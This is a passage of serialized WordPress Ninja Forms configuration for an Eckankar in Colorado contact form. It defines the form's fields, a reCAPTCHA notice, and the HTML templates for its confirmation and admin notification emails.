Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:6;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"6\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:7;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"7\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}}s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:11:\"field_label\";s:15:\"Your Local Area\";s:9:\"field_key\";s:29:\"your_local_area_1515013258725\";}s:2:\"id\";i:147;}i:6;a:2:{s:8:\"settings\";a:18:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:43:\"Select The Person You Would Like To Contact\";s:4:\"type\";s:10:\"listselect\";s:3:\"key\";s:57:\"select_the_person_you_would_like_to_contact_1613166502762\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:2:{i:0;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:1;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:27:\"Initiator-Barbara Schneider\";s:5:\"value\";s:27:\"Initiator-Barbara Schneider\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:1:\"1\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}}s:15:\"container_class\";s:8:\"one-half\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:41:\"Select the person you would like to email\";s:9:\"field_key\";s:55:\"select_the_person_you_would_like_to_email_1515013520503\";}s:2:\"id\";i:150;}i:7;a:2:{s:8:\"settings\";a:27:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:4:\"type\";s:8:\"textarea\";s:3:\"key\";s:37:\"enter_your_message_here_1515013766874\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:12:\"textarea_rte\";s:0:\"\";s:18:\"disable_rte_mobile\";s:0:\"\";s:14:\"textarea_media\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:37:\"enter_your_message_here_1515013766874\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:151;}i:8;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:197:\"This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663798119504\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"625\";}i:9;a:2:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:16:\"processing_label\";s:10:\"Processing\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:20:\"submit_1515013824829\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:20:\"submit_1515013824829\";}s:2:\"id\";i:153;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 12:34:29\";s:5:\"label\";s:9:\"Save Form\";s:16:\"subs_expire_time\";s:2:\"90\";s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"exception_fields\";a:0:{}s:18:\"fields-save-toggle\";s:8:\"save_all\";s:15:\"submitter_email\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:53;}i:1;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 12:34:29\";s:5:\"label\";s:17:\"Send copy to user\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:27:\"{field:email_1515012046399}\";s:13:\"email_subject\";s:35:\"Johnstown Initiators and ESAâs\";s:13:\"email_message\";s:3465:\"<p><br><br><br><br><br><br></p><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br ></td>                                \" valign=\"top\"><br><h1>Eckankar In Colorado</h1><br></td><td> </td></tr></tbody></table><br></td></tr><tr><td align=\"center\" valign=\"top\"><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><br><p><strong>Hello {field:firstname_1515012036721},</strong></p><br><p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Johnstown ECK Leadership Communications team.</p><br><p>Here is a copy of the information that you have submitted:</p><br></td></tr></tbody></table><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br ></td>                                \" valign=\"top\"><br><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong><span data-tag=\"{field:firstname_1515012036721}\"> {field:firstname_1515012036721}</span><br><br>   </span><span style=\"color: #333333\"><strong>LAST NAME:</strong><span data-tag=\"{field:lastname_1515012040393}\"> {field:lastname_1515012040393}</span><br><br>   </span><span style=\"color: #333333\"><strong>EMAIL: </strong><span data-tag=\"{field:email_1515012046399}\">{field:email_1515012046399}</span><br><br>   </span><span style=\"color: #333333\"><strong>TELEPHONE: </strong><span data-tag=\"{field:phone_1515012055554}\">{field:phone_1515012055554}</span></span><br><br>   <span style=\"color: #333333\"><strong>LOCAL AREA:</strong><span data-tag=\"{field:your_local_area_1515013258725}\"> {field:your_local_area_1515013258725}</span><br><br>   </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong><span data-tag=\"{field:select_the_person_you_would_like_to_contact_1613166502762}\"> {field:select_the_person_you_would_like_to_contact_1613166502762}</span></span></p><br><p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:enter_your_message_here_1515013766874}</span></p><br></td></tr></tbody></table><br></td></tr><tr><td align=\"center\" valign=\"top\"><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><br><p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br><br>If you have any questions regarding the origin of this form, please feel free to contact the<br><br> Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br></td></tr></tbody></table><br></td></tr></tbody></table><br></td></tr></tbody></table><br><p> </p><p></p>\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:14:\"drawerDisabled\";s:0:\"\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}s:2:\"id\";i:54;}i:2;a:2:{s:8:\"settings\";a:34:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 12:34:29\";s:5:\"label\";s:15:\"Success Message\";s:16:\"subs_expire_time\";s:2:\"90\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:11:\"success_msg\";s:361:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:55;}i:3;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 12:34:29\";s:5:\"label\";s:11:\"Admin Email\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:35:\"Johnstown Initiators and ESAâs\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:4211:\"<br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><br />\n<br />\n<tbody><br />\n<br />\n<tr><br />\n<br />\n<td align=\"center\" valign=\"top\"><br><br />\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><br />\n<br />\n<tbody><br />\n<br />\n<tr><br />\n<br />\n<td align=\"left\" valign=\"top\"><br><br />\n<br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><br />\n<br />\n<tbody><br />\n<br />\n<tr><br />\n<br />\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br ></td><br />\n<br />\n                                \" valign=\"top\"><br><br />\n<h1>Eckankar In Colorado</h1><br />\n<br><br />\n</td><br />\n<br />\n<td> </td><br />\n<br />\n</tr><br />\n<br />\n</tbody><br />\n<br />\n</table><br />\n<br><br />\n</td><br />\n<br />\n</tr><br />\n<br />\n<tr><br />\n<br />\n<td align=\"center\" valign=\"top\"><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><br />\n<br />\n<tbody><br />\n<br />\n<tr><br />\n<br />\n<td align=\"left\" valign=\"top\"><br><br />\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Johnstown Initiators and ESAâs</span> form submission.<br><br />\n  <br><br />\n </strong><br><br><br />\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Johnstown ECK Leadership organization</em>.<br><br><br />\n <strong><br><br><br />\nThe following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #333333\">{field:firstname_1515012036721} {field:lastname_1515012040393}</span> has submitted:</strong></p><br />\n<br><br />\n</td><br />\n<br />\n</tr><br />\n<br />\n</tbody><br />\n<br />\n</table><br />\n<br><br />\n<br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><br />\n<br />\n<tbody><br />\n<br />\n<tr><br />\n<br />\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br ></td><br />\n<br />\n                                \" valign=\"top\"><br><br />\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:firstname_1515012036721}<br><br><br />\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_1515012040393}<br><br><br />\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong><span data-tag=\"{field:email_1515012046399}\"> {field:email_1515012046399}</span><br><br><br />\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_1515012055554}</span><br><br><br />\n <span style=\"color: #333333\"><strong>LOCAL AREA: </strong>{field:your_local_area_1515013258725}<br><br><br />\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166502762}</span></p><br />\n<br><br />\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:enter_your_message_here_1515013766874}</span></p><br />\n<br><br />\n</td><br />\n<br />\n</tr><br />\n<br />\n</tbody><br />\n<br />\n</table><br />\n<br><br />\n</td><br />\n<br />\n</tr><br />\n<br />\n<tr><br />\n<br />\n<td align=\"center\" valign=\"top\"><br><br />\n<br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><br />\n<br />\n<tbody><br />\n<br />\n<tr><br />\n<br />\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br />\n<br><br />\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br />\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br />\n<br><br />\n</td><br />\n<br />\n</tr><br />\n<br />\n</tbody><br />\n<br />\n</table><br />\n<br><br />\n</td><br />\n<br />\n</tr><br />\n<br />\n</tbody><br />\n<br />\n</table><br />\n<br><br />\n</td><br />\n<br />\n</tr><br />\n<br />\n</tbody><br />\n<br />\n</table><br />\n<br><br />\n<p> </p><br />\n\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:56;}}s:8:\"settings\";a:40:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:34:\"Johnstown Area Initiators and ESAs\";s:10:\"created_at\";s:19:\"2018-01-03 12:34:29\";s:10:\"form_title\";s:40:\"Johnstown Area Initiators and ESAâs\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:3:\"key\";s:0:\"\";s:12:\"date_updated\";s:19:\"2017-07-04 17:33:42\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been 